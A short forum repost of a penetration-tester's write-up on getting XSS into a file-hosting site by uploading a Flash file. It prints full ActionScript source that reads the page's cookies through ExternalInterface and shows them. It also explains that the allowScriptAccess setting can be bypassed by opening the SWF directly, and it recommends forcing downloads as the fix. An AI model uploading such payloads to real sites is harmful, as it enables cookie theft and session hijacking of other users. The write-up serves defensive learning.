A while back I was doing a penetration test on a friends file hosting service application. His service allowed the uploading of flash files and when you viewed the files detail page it showed you a preview of the flash movie. At the time I knew you could use actionscript to put javascript in a flash file but I was not sure if it would have full access to the DOM and allow us to do evil stuff.
I started messing around in actionscript and came up with this:
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;
public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
After compiling it and uploading, when viewing the preview page I was greeted with a prompt box that had the contents of my cookie for that domain and it was displayed in text with in the flash embed! So, just like that we are able to manufacture a XSS vulnerability on a application that is otherwise secure.
There is some protection for this attack. When you embed a flash file in a web page that you don’t trust you should add the allowScriptAccess param and set it to none. However this can be bypassed easily, just go to the swf file itself and it will still execute the javascript supplied by our swf file. This means to be fully protected you will also need to use a modrewrite rule to force a download when ever someone tries to view a swf file directly.
Here is one example –
http://www.ziddu.com/viewfile/22413513/xss.swf.htmlHere is another –
http://swfchan.org/2335/xss.swfOP -
https://www.dc414.org/2013/06/upload-your-own-xss/Staff Note: In the code tag you can select a language for highlighting, I also made it look readable; we like indention. =]
